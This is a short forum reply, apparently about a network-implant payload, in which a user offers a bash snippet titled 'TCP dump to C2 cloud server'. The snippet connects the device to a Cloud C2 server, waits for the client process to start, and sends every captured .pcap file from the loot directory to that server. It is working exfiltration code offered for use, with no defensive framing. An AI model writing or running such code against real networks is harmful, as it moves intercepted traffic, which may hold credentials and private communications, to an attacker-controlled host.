TCP dump to C2 cloud server


OTimme

Try to add this to your payload:

C2PROVISION="/etc/device.config"
LOOT_DIR="/mnt/loot/tcpdump"

# Exfiltrate loot to Cloud C2
if [[ -f "$C2PROVISION" ]]; then
    LED SPECIAL
    # Connect to Cloud C2
    C2CONNECT
    # Wait until the Cloud C2 connection is established
    while ! pgrep cc-client > /dev/null; do sleep 1; done
    # Exfiltrate every capture file in the loot directory
    for f in "$LOOT_DIR"/*.pcap; do
        # Skip the unexpanded pattern when no .pcap files exist
        [[ -e "$f" ]] || continue
        C2EXFIL STRING "$f" tcpdump-C2-Payload
    done
else
    # Exit the script if the device is not provisioned for C2
    LED R SOLID
    exit 1
fi

 
